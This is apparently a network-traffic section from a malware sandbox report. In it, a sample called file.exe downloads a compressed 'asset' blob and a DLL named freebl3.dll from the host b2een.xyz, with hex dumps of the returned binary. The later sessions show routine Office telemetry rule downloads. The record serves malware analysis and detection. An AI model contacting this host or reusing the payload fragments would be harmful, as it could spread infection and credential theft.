2024-11-25 10:34:06 UTC	15808	IN	Data Raw: 1f 8b 08 08 18 f1 40 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7 Data Ascii: @gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: c5 f3 e8 07 bb 82 71 ba da 2a 0b c7 62 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 29 8b 4d 52 3a c4 97 Data Ascii: qb,0Rte\|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;\|a``\|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1)MR:
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: c1 f4 52 a7 67 b3 99 ff bc b7 c2 8e 7c d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 f5 72 cd 6b 58 b5 9b Data Ascii: Rg\|M kt\|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX$Nkct&iZ%b8Zoj@ u2OgA1DG35d*lg\|9GV>OVzVMPA76.\|crkX
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: 41 9e 48 c8 71 d7 39 94 dd f7 b6 3f 2a 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 3b 35 42 38 50 3b bc Data Ascii: AHq9?*H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`;5B8P;
2024-11-25 10:34:07 UTC	5247	IN	Data Raw: 9a 2a 83 ab 27 93 58 c5 2b d2 9c af 2b 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 cf 54 85 de 92 34 2e Data Ascii: *'X++NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt\|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDYT4.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.5	49920	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:06 UTC	235	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:34:07 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:34:06 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Monday, 25-Nov-2024 10:34:06 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-11-25 10:34:07 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wP
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f Data Ascii: 00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 Data Ascii: eUeLXee0@eeeue0UEeeUeee $
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
2024-11-25 10:34:07 UTC	16384	IN	Data Raw: ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.5	49908	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:06 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:07 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:06 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: 0a9ad79b-401e-002a-79d1-3ec62e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103406Z-178bfbc474bq2pr7hC1NYCkfgg00000007gg0000000046g5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:07 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.5	49910	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:06 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:07 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:06 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: ee240466-601e-00ab-24f2-3a66f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103406Z-178bfbc474bnwsh4hC1NYC2ubs00000007g0000000001pe0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:07 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.5	49911	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:06 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:07 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:06 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: 3cbcbade-201e-0000-6443-3ca537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103406Z-174c587ffdfb74xqhC1TEBhabc00000005t000000000bgsu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:07 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.5	49909	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
